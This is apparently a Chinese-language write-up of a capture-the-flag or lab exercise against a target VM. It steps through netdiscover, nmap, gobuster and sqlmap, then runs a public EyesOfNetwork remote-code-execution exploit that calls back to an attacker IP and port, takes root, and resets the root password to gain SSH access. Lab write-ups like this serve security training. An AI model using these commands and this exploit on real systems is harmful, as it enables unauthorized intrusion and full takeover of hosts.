一、信息收集
查找靶机IP
命令:netdiscover -i eth0 -r 192.168.236.0/24
1、端口扫描
命令:nmap -sV -T4 -A -p- 192.168.236.169
22端口尝试ssh密码爆破
66端口,访问,无信息
80端口无信息
111端口无信息
443端口访问,为登陆页面,尝试是否存在sql注入
2403端口,无信息
3306数据库,可登录查看敏感信息
8086端口,无信息
2、目录扫描
命令:gobuster dir -u http://192.168.236.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
无信息
命令:gobuster dir -u http://192.168.236.169:66/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
flag.txt无信息
3、端口号及版本搜索
二、尝试渗透
1、登陆页面SQL注入尝试
命令:sqlmap -r /home/kali/桌面/1.txt --batch
并没有什么信息
2、弱口令登录
尝试几个弱口令,都失败
3、查找已知的框架漏洞
查找这个eyesofnetwork框架是否存在已知的漏洞
下载POC使用:
命令:git clone https://github.com/h4knet/eonrce
命令:./eonrce.py https://192.168.236.169/ -ip 192.168.236.128 -port 4444
最高权限:root
命令:passwd root
设置密码:toor
ssh登录:命令:ssh 192.168.236.169
密码:toor
三、总结
1、联系靶场的话,不能放过任何一个有用信息,登陆页面的框架一定要搜索
2、框架漏洞,要善于搜索